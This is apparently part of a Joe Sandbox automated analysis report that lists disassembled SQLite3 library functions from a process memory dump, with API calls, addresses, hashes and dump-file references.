                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_value
                                                                                              • String ID: replace
                                                                                              • API String ID: 822508682-211625029
                                                                                              • Opcode ID: 3e05829e6dc7bf4e3aee333ad7af3b9330e898756e0c33c38da5fa9a9a7ab51a
                                                                                              • Instruction ID: c68939906527793a1b64b40f01f79120a12f6e09038bffe454741cd93bd6567e
                                                                                              • Opcode Fuzzy Hash: 3e05829e6dc7bf4e3aee333ad7af3b9330e898756e0c33c38da5fa9a9a7ab51a
                                                                                              • Instruction Fuzzy Hash: CD216D386043559BCB11DF68C488A9ABBF5BFC4318FA4C519EC888B310D735D941CB41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E1BD77 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E1BD95
                                                                                                • Part of subcall function 61E19649: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E192D3,?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19651
                                                                                              • sqlite3_realloc.SQLITE3 ref: 61E1BDE3
                                                                                              • sqlite3_free.SQLITE3 ref: 61E1BDF9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                              • String ID: d
                                                                                              • API String ID: 211589378-2564639436
                                                                                              • Opcode ID: 67c3ec3fce4c0ce2a817e1b6b07967d48cefd174ddba59761d7dde80af0ea07b
                                                                                              • Instruction ID: 5eb10806d73b1e158523f5110a8a2eb80c75f1067f5d8bb843f705816c26852d
                                                                                              • Opcode Fuzzy Hash: 67c3ec3fce4c0ce2a817e1b6b07967d48cefd174ddba59761d7dde80af0ea07b
                                                                                              • Instruction Fuzzy Hash: EE21E5B1A04245CFDB10CFA9C4C1699BBF4AF49314F24C4AAD9489B319D738E845CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E1DA40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1DA57
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_aggregate_context
                                                                                              • String ID: "$,$\
                                                                                              • API String ID: 2928764607-4027707629
                                                                                              • Opcode ID: bc74fea373f3912936672a338d039dfaf0a5966c3a05be29c920631548ce789c
                                                                                              • Instruction ID: 3f92a296ed576ced62be27a7d650b2fe3ef4c1cddaef893d23151d14f14db05e
                                                                                              • Opcode Fuzzy Hash: bc74fea373f3912936672a338d039dfaf0a5966c3a05be29c920631548ce789c
                                                                                              • Instruction Fuzzy Hash: 7F112777E0D2158FD708CEA9D489BAABBA5FB88310F19C12BDC188B345C275D9418BD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E1E80C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_int$sqlite3_result_blob
                                                                                              • String ID: <
                                                                                              • API String ID: 2918918774-4251816714
                                                                                              • Opcode ID: 09260fb7672316b6ff5e49a9de58f6847701a6648446cc1570d3fc167f8388f7
                                                                                              • Instruction ID: 65e14bba99f512c2259dd83bc7b5b1a97c298af160ed0ce8368e01df72ad15a2
                                                                                              • Opcode Fuzzy Hash: 09260fb7672316b6ff5e49a9de58f6847701a6648446cc1570d3fc167f8388f7
                                                                                              • Instruction Fuzzy Hash: E0116AB59046068FCB04DF6AD480A9ABBF5FF88364F15C56AE8589B320E334E951CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E27F76 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 61E253DF: sqlite3_log.SQLITE3(?,?,?,?,?,61E25492), ref: 61E2541A
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E27FA9
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E27FE4
                                                                                                • Part of subcall function 61E22C1A: sqlite3_log.SQLITE3 ref: 61E22C43
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID: out of memory
                                                                                              • API String ID: 2575432037-2599737071
                                                                                              • Opcode ID: fa8e613aaf5d897da21f31f316482b2620e0beda794ec253102c0880587d9f2e
                                                                                              • Instruction ID: 87a90fdb5ffeaae849369e44fc4a2a2d4e54ae154a116858fa0a11396628d028
                                                                                              • Opcode Fuzzy Hash: fa8e613aaf5d897da21f31f316482b2620e0beda794ec253102c0880587d9f2e
                                                                                              • Instruction Fuzzy Hash: 47014F70E0C6459BEB149FE9D8D0A1977E4EF55318F28C4A9EC488F309E775D8D08B51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E01440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                              • API String ID: 1646373207-328863460
                                                                                              • Opcode ID: e98d61f42e88015906efc52fd7345656ed150c2a388941d08bff184bef2d7cfc
                                                                                              • Instruction ID: 97a7710ca2d900b5804395d1622dd96b77bdb01bea895aca216a6cb86975ee4a
                                                                                              • Opcode Fuzzy Hash: e98d61f42e88015906efc52fd7345656ed150c2a388941d08bff184bef2d7cfc
                                                                                              • Instruction Fuzzy Hash: BAE065B09187029BE7146FF5850673D79B5AFC1709F62C81CD4809A260E630C491C763
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E1E435 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E1E4A4
                                                                                                • Part of subcall function 61E19E92: sqlite3_initialize.SQLITE3 ref: 61E19E9D
                                                                                              • sqlite3_free.SQLITE3 ref: 61E1E5BB
                                                                                              • sqlite3_result_error_code.SQLITE3 ref: 61E1E6DE
                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E1E6F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_malloc64sqlite3_result_doublesqlite3_result_error_code
                                                                                              • String ID:
                                                                                              • API String ID: 129515768-0
                                                                                              • Opcode ID: e463c9e4b7690211c3701cb2ea35b921039793edd3aa8003e5bcb2004785f1ab
                                                                                              • Instruction ID: 04a17378ea14b44ce9eadbda7fded7dc333c70c530c151f577f799465770b3e1
                                                                                              • Opcode Fuzzy Hash: e463c9e4b7690211c3701cb2ea35b921039793edd3aa8003e5bcb2004785f1ab
                                                                                              • Instruction Fuzzy Hash: 81A10670A08A09DFCB01DF69C58568EBBF5FF88354F218829E899E7754EB30D951CB41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E1DF76 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: localtimesqlite3_mutex_entersqlite3_mutex_leavesqlite3_result_error
                                                                                              • String ID:
                                                                                              • API String ID: 2374424446-0
                                                                                              • Opcode ID: 827466f45b83966ac30bfc7bf5ca05898db6c59b99879be65fd394a527d67c2a
                                                                                              • Instruction ID: 409844891523f88886f7834abeec37d07d6e027c299ec10d5dfcda427ce9be53
                                                                                              • Opcode Fuzzy Hash: 827466f45b83966ac30bfc7bf5ca05898db6c59b99879be65fd394a527d67c2a
                                                                                              • Instruction Fuzzy Hash: 6151F774D08359CFEB20DFA9C884B9DBBF1BF49308F108599D448AB285D7759A84CF52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3944A Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 61E1988D: sqlite3_malloc.SQLITE3 ref: 61E198BA
                                                                                              • sqlite3_free.SQLITE3 ref: 61E39476
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E394A9
                                                                                              • sqlite3_free.SQLITE3 ref: 61E39549
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_entersqlite3_stricmp
                                                                                              • String ID:
                                                                                              • API String ID: 3567284914-0
                                                                                              • Opcode ID: 51e1f9aca7c4950d6ef01b1d072735239844f8cf5418fc0a8e00eb1ea77a4c74
                                                                                              • Instruction ID: 324dc7dfa0aa15ac84d8a32362829b96576e9520db4ebd4c4628efdcec72c002
                                                                                              • Opcode Fuzzy Hash: 51e1f9aca7c4950d6ef01b1d072735239844f8cf5418fc0a8e00eb1ea77a4c74
                                                                                              • Instruction Fuzzy Hash: F531F87590426A9FDB00DFA9C48469EBBF0FF89308F24C469D495A7351DB39E882CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E1F800 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E1F840
                                                                                                • Part of subcall function 61E19E92: sqlite3_initialize.SQLITE3 ref: 61E19E9D
                                                                                              • sqlite3_value_dup.SQLITE3 ref: 61E1F893
                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E1F8C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_initializesqlite3_malloc64sqlite3_result_error_nomemsqlite3_value_dup
                                                                                              • String ID:
                                                                                              • API String ID: 2961385374-0
                                                                                              • Opcode ID: b851badaf6e55b6bf999abe542d9ea4e540164cc3e4c20426ab48a5bceae2a32
                                                                                              • Instruction ID: 1fd5d8aa3848d7be665d5d446f7289994f23a79047d91b0c60f9b96a63a9e919
                                                                                              • Opcode Fuzzy Hash: b851badaf6e55b6bf999abe542d9ea4e540164cc3e4c20426ab48a5bceae2a32
                                                                                              • Instruction Fuzzy Hash: 9A31F8B5A042198FCB00DFA9C481A9EFBF1FF88314F15856AE848EB315D735E991CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3DF02 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E3DF0E
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                                • Part of subcall function 61E19104: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3DF2E
                                                                                              • sqlite3_vfs_find.SQLITE3 ref: 61E3DF6D
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E3E06C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_vfs_find
                                                                                              • String ID:
                                                                                              • API String ID: 321126751-0
                                                                                              • Opcode ID: 0124bbcddc4683bbdb1862ba3c722b3477c831713c853466f33d080d3be2860d
                                                                                              • Instruction ID: 556d5ff210a6a9dda9e20fccd96b93403789d07dc4e8b7565a9921f2bfbde692
                                                                                              • Opcode Fuzzy Hash: 0124bbcddc4683bbdb1862ba3c722b3477c831713c853466f33d080d3be2860d
                                                                                              • Instruction Fuzzy Hash: 3141713581CAE88EC7228B7A85947D9BFF1DF97718F1986D9D4C487342C234C589CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E25F80 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_value_blob
                                                                                              • String ID:
                                                                                              • API String ID: 3596987688-0
                                                                                              • Opcode ID: 373ba197613c6f8d5a1cd2f4a0ec1a07bdebb2db5a83a0715513c98f4b5c900e
                                                                                              • Instruction ID: fdcfb8a3130a5aeb140bc70c888933f5b022729a26285a9ac8816fd6f9d2e5df
                                                                                              • Opcode Fuzzy Hash: 373ba197613c6f8d5a1cd2f4a0ec1a07bdebb2db5a83a0715513c98f4b5c900e
                                                                                              • Instruction Fuzzy Hash: C731C5B1A047469FC700DF69C881A9EBBF4BF89364F24C92DE4A8D7350D738D9518B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E229F2 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E22A68
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E22B00
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E22B20
                                                                                              • sqlite3_free.SQLITE3 ref: 61E22B28
                                                                                                • Part of subcall function 61E12EAE: sqlite3_free.SQLITE3 ref: 61E12F54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_snprintf$sqlite3_win32_is_nt
                                                                                              • String ID:
                                                                                              • API String ID: 4082161338-0
                                                                                              • Opcode ID: 093940a7889a174a1f3ae7046bcff3f7e6bbd7464fc83dd9ec95bc8711af41e5
                                                                                              • Instruction ID: 5a571a6d3adf4b97babb97a7da5551c124310bc1e8b124b05cf76e957d722eea
                                                                                              • Opcode Fuzzy Hash: 093940a7889a174a1f3ae7046bcff3f7e6bbd7464fc83dd9ec95bc8711af41e5
                                                                                              • Instruction Fuzzy Hash: BA31C5B09183469FD7009FBAD45875EBBF4AF98748F20C82DE498A7340D779C5458F92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E1484D Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E1499A), ref: 61E1487B
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E1499A), ref: 61E148D2
